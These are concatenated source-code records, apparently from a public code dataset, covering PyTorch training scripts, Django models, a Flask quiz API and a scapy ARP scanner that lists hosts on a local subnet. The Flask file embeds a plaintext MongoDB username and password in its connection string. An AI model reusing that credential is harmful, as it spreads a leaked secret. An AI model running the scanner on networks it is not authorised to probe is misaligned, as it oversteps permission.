torch.max(out).item()\n proba = min(proba, 1)\n proba = max(proba, 0)\n probas.append(proba)\n\n print(probas)\n return probas\n\ndef num_features():\n return len(train_seqs[0][0])\n\n\ndef train_variable_rnn():\n logger.info(\"Epochs: {}, batch size: {}, Cuda: {}, workers: {}\".format(NUM_EPOCHS, BATCH_SIZE,\n USE_CUDA, NUM_WORKERS))\n\n torch.manual_seed(1)\n if device.type == 'cuda':\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # Data loading\n print('===> Loading entire datasets')\n\n assert (len(train_seqs) == len(train_labels))\n assert (len(valid_seqs) == len(valid_labels))\n assert (len(test_seqs) == len(test_labels))\n\n logger.info(\"num_features: {}\".format(num_features()))\n logger.info(\"train patients: {}\".format(len(train_seqs)))\n logger.info(\"val patients: {}\".format(len(valid_seqs)))\n\n train_dataset = VisitSequenceWithLabelDataset(train_seqs, train_labels, num_features())\n valid_dataset = VisitSequenceWithLabelDataset(valid_seqs, valid_labels, num_features())\n\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, shuffle=True, collate_fn=visit_collate_fn,\n num_workers=NUM_WORKERS)\n valid_loader = DataLoader(dataset=valid_dataset, batch_size=BATCH_SIZE, shuffle=False, collate_fn=visit_collate_fn,\n num_workers=NUM_WORKERS)\n # batch_size for the test set should be 1 to avoid sorting each mini-batch which breaks the connection with patient IDs\n\n model = MyLSTM(batch_size=BATCH_SIZE, input_size=num_features())\n\n optimizer = optim.Adam(model.parameters())\n\n model.to(device)\n criterion.to(device)\n\n best_val_acc = 0.0\n train_losses, train_accuracies = [], []\n valid_losses, valid_accuracies = [], []\n for epoch in range(NUM_EPOCHS):\n train_loss, train_accuracy = train(model, device, train_loader, criterion, optimizer, epoch)\n valid_loss, valid_accuracy, valid_results = evaluate(model, device, valid_loader, criterion)\n\n train_losses.append(train_loss)\n valid_losses.append(valid_loss)\n\n train_accuracies.append(train_accuracy)\n valid_accuracies.append(valid_accuracy)\n\n is_best = valid_accuracy > best_val_acc # let's keep the model that has the best accuracy, but you can also use another metric.\n if is_best:\n best_val_acc = valid_accuracy\n torch.save(model, MODEL_PATH)\n\n plot_learning_curves(train_losses, valid_losses, train_accuracies, valid_accuracies)\n\n\ndef score_model(path=MODEL_PATH):\n best_model = torch.load(path)\n test_loss, test_accuracy, test_results = evaluate(best_model, device, test_loader(), criterion)\n\n class_names = ['No Sepsis', 'Sepsis']\n # plot_confusion_matrix(test_results, class_names)\n\n Y = []\n y_pred = []\n\n for i,j in test_results:\n Y.append(i)\n y_pred.append(j)\n\n calc_scores(Y, y_pred, clf_name=\"LSTM\")\n fig = plot_confusion_matrix(Y, y_pred, clf_name=\"LSTM\")\n save_fig(fig, \"confusion\")\n\n\nif __name__ == \"__main__\":\n train_variable_rnn()\n score_model()\n","repo_name":"ach39/Big-Data","sub_path":"sepsis_prediction/src/rnn/train_variable_rnn.py","file_name":"train_variable_rnn.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36253964825","text":"import logging\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tqdm import tqdm\n\nfrom models.local_loss_net import LocalLossNet\nfrom optimizers.sam import SAM\nfrom utils.data import to_one_hot\nfrom models.local_loss_blocks import LocalLossBlockLinear, LocalLossBlockConv\nfrom utils.logging import get_logger, get_csv_logger, retire_logger\nfrom utils.models import count_parameters\n\n\nclass Trainer:\n\n def __init__(self, cfg, model, train_set, valid_set, logger=None):\n self.cfg = cfg\n self.model = model\n self.logger = logger\n if logger is None:\n self.logger = get_logger(__name__, logging.INFO)\n self.csv_logger = None\n self.logger.info(model.__str__())\n self.logger.info(f'Model has {count_parameters(model)} parameters influenced by global loss')\n\n self.train_set = train_set\n self.valid_set = valid_set\n\n\n self.model.set_learning_rate(cfg.lr)\n self.select_optimizer()\n\n if cfg.gpus:\n self.model.cuda()\n\n self.train_loader = self.get_loader(train_set)\n self.valid_loader = self.get_loader(valid_set, shuffle=False)\n\n def get_loader(self, data_set, shuffle=True):\n kwargs = {'pin_memory': True} if self.cfg.gpus else {}\n return torch.utils.data.DataLoader(\n data_set,\n batch_size=self.cfg.batch_size,\n shuffle=shuffle,\n num_workers=self.cfg.data_loader_workers,\n worker_init_fn=lambda worker_id: np.random.seed(\n self.cfg.seed + worker_id),\n **kwargs)\n\n def select_optimizer(self):\n if self.cfg.sam.active:\n if self.cfg.optim == 'sgd':\n self.optimizer = SAM(self.model.parameters(), optim.SGD,\n rho=self.cfg.sam.rho, adaptive=self.cfg.sam.adaptive,\n lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n momentum=self.cfg.momentum)\n elif self.cfg.optim == 'adam' or self.cfg.optim == 'amsgrad':\n self.optimizer = SAM(self.model.parameters(), optim.Adam,\n rho=self.cfg.sam.rho, adaptive=self.cfg.sam.adaptive,\n lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n amsgrad=self.cfg.optim == 'amsgrad')\n if self.cfg.lr_scheduler:\n self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer.base_optimizer, step_size=1,\n gamma=self.cfg.lr_gamma)\n elif self.cfg.optim == 'sgd':\n self.optimizer = optim.SGD(self.model.parameters(), lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n momentum=self.cfg.momentum)\n elif self.cfg.optim == 'adam' or self.cfg.optim == 'amsgrad':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n amsgrad=self.cfg.optim == 'amsgrad')\n else:\n raise ValueError(f'Unknown optimizer {self.cfg.optim}')\n\n def trainiter(self):\n\n ''' Train model on train set'''\n self.model.train()\n correct = 0\n loss_total_local = 0\n loss_total_global = 0\n\n # Add progress bar\n if self.cfg.progress_bar:\n pbar = tqdm(total=len(self.train_loader))\n\n # Clear layerwise statistics\n if not self.cfg.no_print_stats:\n for m in self.model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n m.clear_stats()\n\n # Loop train set\n for batch_idx, (data, target) in enumerate(self.train_loader):\n if self.cfg.gpus:\n data, target = data.cuda(), target.cuda()\n target_ = target\n target_onehot = to_one_hot(target, self.cfg.num_classes)\n if self.cfg.gpus:\n target_onehot = target_onehot.cuda()\n\n # Clear accumulated gradient\n self.optimizer.zero_grad()\n self.model.optim_zero_grad()\n\n output, loss = self.model(data, target, target_onehot)\n loss_total_local += loss * data.size(0)\n loss = F.cross_entropy(output, target)\n if self.cfg.loss_sup == 'predsim' and not self.cfg.backprop:\n loss *= (1 - self.cfg.beta)\n loss_total_global += loss.item() * data.size(0)\n\n # Backward pass and optimizer step\n # For local loss functions, this will only affect output layer\n loss.backward()\n if self.cfg.sam.active:\n self.optimizer.first_step(zero_grad=True)\n self.model.local_loss_eval()\n F.cross_entropy(self.model(data), target).backward()\n self.optimizer.second_step()\n self.model.local_loss_train()\n else:\n self.optimizer.step()\n\n # If special option for no detaching is set, update weights also in hidden layers\n if self.cfg.no_detach:\n self.model.optim_step()\n\n pred = output.max(1)[1] # get the index of the max log-probability\n #print(pred, target)\n correct += pred.eq(target_).cpu().sum()\n\n # Update progress bar\n if self.cfg.progress_bar:\n pbar.set_postfix(loss=loss.item(), refresh=False)\n pbar.update()\n\n #break\n\n if self.cfg.progress_bar:\n pbar.close()\n\n loss_average_local = loss_total_local / len(self.train_loader.dataset)\n loss_average_global = loss_total_global / len(self.train_loader.dataset)\n error_percent = 100 - 100.0 * float(correct) / len(self.train_loader.dataset)\n \"\"\"string_print = 'Train epoch={}, lr={:.2e}, loss_local={:.4f}, loss_global={:.4f}, error={:.3f}%, mem={:.0f}MiB, max_mem={:.0f}MiB\\n'.format(\n epoch,\n lr, \n loss_average_local,\n loss_average_global,\n error_percent,\n torch.cuda.memory_allocated()/1e6,\n torch.cuda.max_memory_allocated()/1e6)\n if not args.no_print_stats:\n for m in model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n string_print += m.print_stats() \n print(string_print)\"\"\"\n\n return loss_average_local, loss_average_global, 100-error_percent\n\n def validate(self):\n ''' Run model on validation set '''\n self.model.eval()\n loss_total_local = 0\n valid_loss = 0\n correct = 0\n\n # Clear layerwise statistics\n if not self.cfg.no_print_stats:\n for m in self.model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n m.clear_stats()\n\n # Loop valid set\n for data, target in self.valid_loader:\n if self.cfg.gpus:\n data, target = data.cuda(), target.cuda()\n target_ = target\n target_onehot = to_one_hot(target, self.cfg.num_classes)\n if self.cfg.gpus:\n target_onehot = target_onehot.cuda()\n\n with torch.no_grad():\n output, loss = self.model(data, target, target_onehot)\n loss_total_local += loss * data.size(0)\n valid_loss += F.cross_entropy(output, target).item() * data.size(0)\n pred = output.max(1)[1] # get the index of the max log-probability\n correct += pred.eq(target_).cpu().sum()\n\n #break\n\n loss_average_local = loss_total_local / len(self.train_loader.dataset)\n loss_average = valid_loss / len(self.valid_loader.dataset)\n if self.cfg.loss_sup == 'predsim' and not self.cfg.backprop:\n loss_average *= (1 - self.cfg.beta)\n error_percent = 100 - 100.0 * float(correct) / len(self.valid_loader.dataset)\n \"\"\"string_print = 'Validate loss_global={:.4f}, error={:.3f}%\\n'.format(loss_average, error_percent)\n if not self.cfg.no_print_stats:\n for m in self.model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n string_print += m.print_stats()\n print(string_print)\"\"\"\n\n return loss_average_local, loss_average, 100-error_percent\n\n def fit(self):\n ''' The main training and testing loop '''\n torch.autograd.set_detect_anomaly(True)\n # start_epoch = 1 if checkpoint is None else 1 + checkpoint['epoch']\n self.csv_logger = get_csv_logger(file_path='training_results.csv')\n # TODO: add checkpoint loading\n for epoch in range(self.cfg.epochs):\n # Train and test\n train_loss_local, train_loss_global, train_acc = self.trainiter()\n self.log_results(epoch, train_loss_local, train_loss_global, train_acc, msg='Train Run')\n valid_loss_local, valid_loss_global, valid_acc = self.validate()\n self.log_results(epoch, valid_loss_local, valid_loss_global, valid_acc, msg='Validation Run')\n self.csv_logger.info(f'{epoch},'\n f'{train_loss_local},{train_loss_global},{train_acc/100},'\n f'{valid_loss_local},{valid_loss_global},{valid_acc/100}')\n if self.cfg.exponential_lr_scheduler:\n self.scheduler.step()\n if isinstance(self.model, LocalLossNet):\n self.model.lr_scheduler_step()\n self.save_checkpoint(epoch, self.model, self.optimizer)\n\n retire_logger(self.csv_logger)\n\n def save_checkpoint(self, epoch, model, optimizer):\n # Check if to save checkpoint\n if self.cfg.checkpointing:\n os.makedirs(self.cfg.checkpoint_dir, exist_ok=True)\n torch.save({\n 'model_state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()\n\n }, os.path.join(self.cfg.checkpoint_dir, f'{epoch}.pt'))\n\n def log_results(self, epoch, local_loss, global_loss, accuracy, msg=\"\"):\n self.logger.info(f'{msg}\\n\\t\\t'\n f'epoch: {epoch}\\n\\t\\t'\n f'local loss: {local_loss:.4f}\\n\\t\\t'\n f'global loss: {global_loss:.4f}\\n\\t\\t'\n f'accuracy: {accuracy:.3f}%\\n\\t\\t'\n f'mem: {torch.cuda.memory_allocated() / 1e6:.0f} MiB\\n\\t\\t'\n f'max mem: {torch.cuda.max_memory_allocated() / 1e6:.0f} MiB')\n","repo_name":"bonfab/local-error-signals","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72965287800","text":"from django.utils import timezone\nimport datetime\n\nfrom smart_selects.db_fields import ChainedForeignKey,GroupedForeignKey\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n\nCONFIGURATION =( \n ('GHS','GHS'),\n ('GHX','GHX'),\n ('GXX','GXX'),\n ('OHS','OHS'),\n ('OHX','OHX'),\n ('OXX','OXX')\n)\n\nDG_OWNERSHIP = (\n ( \"HTT-DG\",\"HTT-DG\"),\n (\"LL-DG\",\"LL-DG\"),\n (\"NON-DG\",\"NON-DG\")\n)\n\nZONE = (\n (\"Coastal\",\"Coastal\"),\n (\"Northern\",\"Northern\"),\n (\"Southern\",\"Southern\")\n)\n\nREGION = (\n (\"Dar es salaam\",\"Dar es salaam\"),\n (\"Tanga\",\"Tanga\"),\n (\"Pwani\",\"Pwani\"),\n (\"Lindi\",\"Lindi\"),\n (\"Mtwara\",\"Mtwara\"),\n (\"Ruvuma\",\"Ruvuma\"),\n (\"Morogoro\",\"Morogoro\")\n)\n\nGRID_STATUS = (\n (\"Off Grid\",\"Off Grid\"),\n (\"Grid\",\"Grid\")\n)\n\nSITE_CLASS = (\n (\"Platinum\",\"Platinum\"),\n (\"Gold\",\"Gold\"),\n (\"Silver\",\"Silver\")\n)\n\nLUKU_PAYMENT =( \n (\"Post-Paid\", \"Post-Paid\"),\n (\"Pre-Paid\",\"Pre-Paid\"),\n (\"Off-Grid\",\"Off-Grid\"),\n (\"LandLord\",\"LandLord\"),\n (\"Consolidated\",\"Consolidated\")\n)\n\nSITE_STATUS =(\n (\"On Air\",\"On Air\"),\n (\"Decomisioned\",\"Decomisioned\")\n)\n\nVISIT_TYPE =(\n (\"QSV\",\"QSV\"),\n (\"1SVM\",\"1SVM\")\n)\n\nSITE_TYPE = (\n (\"IBS\",\"IBS\"),\n (\"Roof Top\",\"Roof Top\"),\n (\"Green Field\",\"Green Field\")\n)\n\nCRITICALITY =( \n (\"C1\",\"C1\"),\n (\"C2\",\"C2\")\n)\n\n#this will be used in any dropdown where selection is yes or no\nYES_NO_SELECTION = (\n (\"YES\",\"YES\"),\n (\"NO\",\"NO\"),\n)\n\n#Issues hindering access restriction to the sites\nACCESS_RESTRICTION = (\n (\"Safety Reasons\",\"Safety Reasons\"),\n (\"Permit Reasons\", \"Permit Reasons\"),\n (\"No Restriction\", \"No Restriction\"),\n)\n\nVEHICLE_STATUS = (\n (\"In Service\",\"In Service\"),\n (\"Out of Service\",\"Out of Service\"),\n)\n\nSPA_SELECTION = (\n ('Configured', 'Configured'),\n ('Non-Configured', 'Non-Configgured'),\n ('Optimized', 'Optimized'),\n)\n\nSITE_SHELTER = (\n ('Indoor', 'Indoor'),\n ('Outdoor', 'Outdoor'),\n)\n\nHTT_CLASS = (\n ('B','B'),\n ('C','C'),\n)\n\nCAR_OWNERSHIP = (\n ('Leased', 'Leased'),\n ('Owned', 'Owned'),\n)\n\nPOWER_TYPE = (\n ('AC','AC'),\n ('DC','DC')\n)\n\nclass FleetVehicle(models.Model):\n driver_name = models.CharField(max_length=50, blank=False, unique=True, null=True)\n registration_number = models.CharField(max_length=10, blank=False, unique=True, null=True)\n phone_number = models.IntegerField(blank=False, unique=True, null=True)\n vehicle_status = models.CharField(choices=VEHICLE_STATUS, max_length=50, blank=True, null=True, default=\"In Service\")\n car_ownership = models.CharField(choices=CAR_OWNERSHIP, max_length=50, blank=True, default='Owned')\n\n class Meta:\n verbose_name = 'Fleet Vehicle'\n verbose_name_plural = 'Fleet Vehicles'\n\n def __str__(self):\n return self.registration_number\n\n\nclass FuelStation(models.Model):\n station_name = models.CharField(max_length=50 ,blank=False, unique=True, null=True)\n class Meta:\n verbose_name = 'Fuel Station'\n verbose_name_plural = 'Fuel Stations'\n \n def __str__(self):\n return self.station_name\n\n\nclass Cluster(models.Model):\n cluster_name = models.CharField(max_length=50,unique=True,blank=False, null=True)\n noc_operator = models.CharField(max_length=100, blank=False)\n field_supervisor = models.CharField(max_length=100, blank=False)\n zonal_manager = models.CharField(max_length=100, blank=False)\n zone = models.CharField(choices=ZONE, max_length=20, blank=False)\n maintanance_partner = models.CharField(max_length=15, blank=False, default='PIVOTECH')\n\n def __str__(self):\n return self.cluster_name\n\n\nclass FieldEngineer(models.Model):\n cluster = models.ForeignKey('Cluster', null=True, blank=True, on_delete=models.SET_NULL)\n field_engineer = models.CharField(max_length=30, unique=True)\n joining_date = models.DateField(blank=True, null=True)\n phone_number = models.IntegerField(unique=True, null=True, blank=True)\n alternate_number = models.IntegerField(unique=True, null=True, blank=True)\n GMT = models.CharField(max_length=20, null=True, blank=True)\n vehicle = models.OneToOneField(FleetVehicle, on_delete=models.SET_NULL, null=True, primary_key=False)\n\n def __str__(self):\n return self.field_engineer\n class Meta:\n verbose_name = 'Field Engineer'\n verbose_name_plural = 'Field Engineers'\n\n @property\n def age_of_service(self):\n age_of_service = (datetime.datetime.now().date() - self.joining_date).days\n return age_of_service\n \n\nclass Site(models.Model):\n HTA_ID = models.CharField(primary_key=True, max_length=10, unique=True, blank=False)\n tenant_ID = models.CharField(max_length=10, blank=False)\n site_name = models.CharField(max_length=100, blank=False, null=True)\n anchor_tenant = models.CharField(max_length=30, blank=False, null=True)\n number_of_tenants = models.IntegerField(null=True, blank=True)\n fuel_station = models.ForeignKey('FuelStation', related_name='FuelStation', null=True, on_delete=models.SET_NULL)\n cluster = models.ForeignKey('Cluster', related_name='Cluster', null=True, on_delete=models.SET_NULL)\n region = models.CharField(choices=REGION, max_length=50, null=True) \n field_engineer = ChainedForeignKey(\n FieldEngineer, \n chained_field='cluster',\n chained_model_field='cluster',\n show_all=False,\n auto_choose=False,\n sort=True)\n grid_status = models.CharField(choices=GRID_STATUS, default='Grid', null=True, max_length=50)\n configuration = models.CharField(choices=CONFIGURATION, default='GXX', null=True, max_length=50)\n dg_ownership = models.CharField(choices=DG_OWNERSHIP, default='HTT-DG', null=True, max_length=50)\n site_class = models.CharField(choices=SITE_CLASS, default='Silver', null=True, max_length=50)\n luku_payment = models.CharField(choices=LUKU_PAYMENT, default='Pre-Paid', null=True, max_length=50)\n site_status = models.CharField(choices=SITE_STATUS, default='Online', null=True, max_length=50)\n htt_class = models.CharField(choices=HTT_CLASS, default='C',null=True, max_length=10)\n QSV = models.CharField(choices=YES_NO_SELECTION, null=True, max_length=50, default='NO')\n site_type = models.CharField(choices=SITE_TYPE, default='Green Field', null=True, max_length=250)\n criticality = models.CharField(choices=CRITICALITY, default='C1', null=True, max_length=50)\n dg_present = models.CharField(choices=YES_NO_SELECTION, default='YES', null=True, max_length=50)\n DG_type = models.CharField(max_length=250, null=True)\n tanesco_region = models.CharField(max_length=250, null=True, blank=True)\n meter_number = models.IntegerField(null=True, blank=True)\n luku_cph = models.DecimalField(max_digits=10, decimal_places=1)\n fuel_cph = models.DecimalField(max_digits=10, decimal_places=1)\n SPA_Status = models.CharField(choices=SPA_SELECTION, max_length=50, default='Optimized', null=True, blank=True)\n site_load = models.CharField(max_length=10, null=True, blank=True)\n power_type = models.CharField(choices=POWER_TYPE, max_length=50, default='DC', null=True, blank=True)\n MKII_PLC = models.CharField(choices=YES_NO_SELECTION, default='YES', max_length=50)\n PLC_locked = models.CharField(choices=YES_NO_SELECTION, default='YES', max_length=50)\n dg_capacity = models.IntegerField()\n tank_capacity = models.IntegerField(null=True)\n site_shelter = models.CharField(choices=SITE_SHELTER, default='Outdoor',max_length=50, null=True, blank=True)\n ETA = models.TimeField()\n ERT = models.TimeField()\n access_restricted = models.CharField(choices=YES_NO_SELECTION, default='NO',max_length=50, null=True, blank=True)\n restriction_reasons = models.CharField(choices=ACCESS_RESTRICTION, default=\"No Restriction\",max_length=250, null=True, blank=True)\n latitude = models.FloatField(blank=True, null=True)\n longitude = models.FloatField(blank=True, null=True)\n \n def __str__(self):\n return '{} {}'.format(self.site_name,self.tenant_ID)\n\n\nclass RelayData(models.Model):\n StartDate = models.DateField()\n zone = models.CharField(choices=ZONE, default='Coastal',max_length=50)\n LegacySiteID = models.CharField(max_length=50)\n SiteName = models.CharField(max_length=50)\n GeneratorRunDHM = models.CharField(max_length=50)\n GeneratorRunMinutes = models.CharField(max_length=50)\n CummulativeRunningDHM = models.CharField(max_length=50)\n CummulativeRunningMinutes = models.CharField(max_length=50)\n GeneratorStopMinutes = models.CharField(max_length=50)\n GeneratorStopDHM = models.CharField(max_length=50)\n CummulativeStopMinutes = models.CharField(max_length=50)\n CummulativeStopDHM = models.CharField(max_length=50)\n datasourcename\t= models.CharField(max_length=50)\n HTT_TrialSite = models.CharField(max_length=50)\n\n class Meta:\n verbose_name = 'Relay Data'\n verbose_name_plural = 'Relay Data'\n\n def __str__(self):\n return self.SiteName\n ","repo_name":"JAXPARROW/PivoTech-v2","sub_path":"siteinfo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1274116670","text":"if __name__ == \"__main__\":\n r,c = map(int,input().split())\n count = 0\n r1 = []\n c1 = []\n\n for j in range(r):\n s = input()\n\n for i in range(c):\n if s[i] == 'S':\n c1.append(i)\n r1.append(j)\n count += 1\n \n if(count == r*c):\n print(0)\n else:\n print(r*c - len(set(r1))*len(set(c1)))","repo_name":"rupeshmohanty/Competitive-programming-problems","sub_path":"Python/Codeforces/cakeminator.py","file_name":"cakeminator.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27160193951","text":"# Author: Yuganthi Krishnamurthy\n# Banner number : B00839935 \nfrom flask import Flask, request, Blueprint\nimport pymongo\nfrom flask_restx import Resource,Api\n\nquiz_blueprint = Blueprint('fetchQuestions',__name__)\napi = Api(quiz_blueprint)\n\nclient=pymongo.MongoClient(\"mongodb+srv://shwethasubash:webgroup19@webtutorial.uaxed.mongodb.net/QuizzRoom?retryWrites=true&w=majority\")\ndb=client.QuizzRoom\nuserCollection=db.Question_temp\n\nclass QuestionDetails(Resource):\n def get(self):\n results=userCollection.aggregate([{'$match':{'questionId':{'$gte':1}}}])\n questionSet=[]\n for result in results:\n question = {}\n question['questionId']=result['questionId']\n question['question']=result['question']\n question['options']=result['options']\n question['selectedOption']=False\n question['type']=result['type']\n questionSet.append(question)\n return {\"QuestionSet\":questionSet}\n\n\napi.add_resource(QuestionDetails,'/fetchQuestions')\n","repo_name":"Darpan313/Group19_QuizRoom","sub_path":"api/quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23926230067","text":"import os\nimport cv2\nfrom Common.pnid_xml import text_xml_reader, symbol_xml_reader\nfrom Visualize.image_drawing import draw_bbox_from_bbox_list\n\n# 현대엔지니어링 이미지 도면에 -001-001이 모두 일괄적으로 저장되어 있어서 이를 없애도록 변경\n\nxml_dir = \"D:/Test_Models/PNID/HyundaiEng/210518_Data/Symbol_XML\"\ndrawing_img_dir = \"D:/Test_Models/PNID/HyundaiEng/210518_Data/Drawing/JPG_tmp\"\noutput_img_dir = \"D:/Test_Models/PNID/HyundaiEng/210518_Data/Symbol_XML_Visualize\"\nis_text_xml = False\n\ndrawing_filenames = os.listdir(drawing_img_dir)\n\nfor drawing_filename in drawing_filenames:\n print(drawing_filename)\n name_only = drawing_filename.split(\".\")[0]\n splitted_name = name_only.split(\"-\")\n corrected_name = \"\"\n for i in range(len(splitted_name)-2): # 끝의 001 두개를 없애야 함\n corrected_name += splitted_name[i]\n corrected_name += \"-\"\n\n corrected_name = corrected_name[:-1]\n\n from_filename = os.path.join(drawing_img_dir, drawing_filename)\n to_filename = os.path.join(drawing_img_dir, corrected_name + \".jpg\")\n\n os.rename(from_filename, to_filename)\n\n","repo_name":"diskhkme/PNID","sub_path":"Tools/Misc/filename_change.py","file_name":"filename_change.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"22199266269","text":"from typing import Union\nfrom uuid import UUID\n\nfrom .base_field import BaseField\n\n\nclass UUIDField(BaseField):\n \"\"\" Field responsible for storing :py:class:`uuid.UUID`. \"\"\"\n\n def __init__(self, binary=True, *args, **kwargs):\n self._binary = binary\n super().__init__(*args, **kwargs)\n\n def validate(self, value):\n if not isinstance(value, UUID):\n try:\n UUID(value)\n except (ValueError, TypeError, AttributeError) as e:\n self.error(f\"Could not convert to UUID: {e}\")\n\n def is_empty(self, value) -> bool:\n return value is None or str(value) == \"\"\n\n def get_value(self, value) -> UUID:\n value = super().get_value(value)\n if isinstance(value, str):\n try:\n value = UUID(value)\n except (ValueError, TypeError, AttributeError):\n return value\n return value\n\n def to_son(self, value) -> Union[None, UUID]:\n if not self._binary:\n return str(value)\n elif isinstance(value, str):\n return UUID(value)\n return value\n\n def from_son(self, value) -> Union[None, UUID]:\n if not self._binary:\n original_value = value\n try:\n if not isinstance(value, str):\n value = str(value)\n return UUID(value)\n except (ValueError, TypeError, AttributeError):\n return original_value\n return value\n","repo_name":"wangjiancn/aiomongoengine","sub_path":"src/aiomongoengine/fields/uuid_field.py","file_name":"uuid_field.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"23113922765","text":"import numpy as np\nimport time\n\nW = 0\nP = 0\nnp.random.seed(100)\nfor i in range(10):\n M = np.random.rand(100, 120 )\n N = np.random.rand(120, 100)\n start = time.time()\n np.matmul(M, N)\n end = time.time()\n W += end - start\nprint(W/10)\n\nfor i in range(10):\n Y = np.random.randint(3, size=(100, 200))\n Z = np.random.randint(3, size=(200, 100))\n start1 = time.time()\n np.matmul(Y, Z)\n end1 = time.time()\n P += end1 - start1\n\nprint(P/10)","repo_name":"J-Shen24k/Introduction-to-Advanced-Studies-II","sub_path":"HW1/doublematrices copy.py","file_name":"doublematrices copy.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18181355773","text":"import scapy.all as scapy\nfrom tabulate import tabulate\n\ndef main():\n\tstation, client = escanear_red(\"192.168.1.0/24\", \"eth0\")\n\n\timprimir_tabla(\"Estacion\", station)\n\timprimir_tabla(\"Clientes\", client)\n\ndef escanear_red(ip, interface):\n\tarp = scapy.ARP(pdst=ip)\n\tether = scapy.Ether(dst=\"FF:FF:FF:FF:FF:FF\")\n\n\tanswer, _ = scapy.srp(ether/arp, timeout=1, iface=interface, verbose=False)\n\n\tstation = [{\"ip\": arp.psrc, \"mac\": arp.hwsrc}]\n\tclient = [{\"ip\": received.psrc, \"mac\": received.hwsrc} for _, received in answer]\n\t\n\treturn station, client\n\ndef imprimir_tabla(name, elements):\n\tprint(f\"\\n{name}:\")\n\tprint(tabulate(elements, headers=\"keys\", showindex=\"always\", tablefmt=\"fancy_grid\"))\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"FernandoPerezLara/network-scanner","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21473609187","text":"from fastapi import FastAPI\nimport uvicorn\nimport openai\nimport os\nfrom dotenv import dotenv_values\nimport json\nfrom transformers import pipeline\n\nzeroshot = pipeline(model=\"facebook/bart-large-mnli\")\n\nconfig = dotenv_values(\".env\")\nopenai.api_key = config[\"API_KEY\"]\n\napp = FastAPI()\n\nf = open('data/questions.json')\ndata = json.load(f)\ndef patient_description(answer):\n description = \"\"\n if answer[0] == 1:\n description+=\"Patient has trouble developing social ties \"\n if answer[1] > 5:\n description+=\"Patient has difficulty identifying emotions of others \"\n if answer[2] > 5:\n description+=\"Patient has difficulty maintaining eye contact \"\n if 5 > answer[3]:\n description+=\"Patient dislikes physical contact \"\n if answer[5] > 5:\n description+=\"Patient dislikes change \"\n if (answer[9] > 5) or (answer[7] > 5):\n description+=\"Patient is sensitive to textures or noises \"\n if answer[10] > 5:\n description+=\"Patient has difficulty studying \"\n if answer[12] > 5:\n description+=\"Patient often forgets things \"\n if answer[13] > 5:\n description+=\"Patient cannot stay still \"\n if answer[16] > 5:\n description+=\"Patient cannot read long texts with ease \"\n if answer[17] > 5:\n description+=\"Patient makes spelling mistakes often \"\n if answer[22] > 5:\n description+=\"Patient often feels in another reality \"\n if answer[23] > 5:\n description+=\"Patient expresses themselves with difficulty \"\n return description\n\n@app.get(\"/explain\")\ndef explain(subject: str, condition: str, interest: str) -> dict:\n \"\"\"Explain subject based on a list of interests\"\"\"\n base_text = f\"Explain {subject} to a {condition} patient interested in {interest}\"\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=base_text,\n temperature=0,\n max_tokens=100\n )\n return completion\n\n@app.post(\"/diagnosis\")\ndef diagnosis(answers: list) -> dict:\n description = patient_description(answers)\n classification = zeroshot(description,\n candidate_labels=[\"autism\", \"adhd\", \"dyslexia\", \"schizophrenia\", \"nothing\"],\n )\n return {\"diagnosis\": classification[\"sequence\"], \"condition\": classification[\"labels\"][0]}\n","repo_name":"sebaspv/educaid-diagnosis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"7971084240","text":"import unittest\nfrom mantid.geometry import BoundingBox\nfrom mantid.kernel import V3D\n\nclass BoundingBoxTest(unittest.TestCase):\n\n def test_default_construction_is_allowed(self):\n box = BoundingBox()\n self.assertTrue(isinstance(box, BoundingBox))\n self.assertTrue(box.isNull())\n\n def test_construction_with_min_max_values_is_allowed(self):\n box = BoundingBox(1.0, 4.0, 5.0, 0.0, 2.0, 3.0)\n self.assertTrue(isinstance(box, BoundingBox))\n\n def test_properties_are_correct(self):\n bbox = BoundingBox (1.0, 2.0, 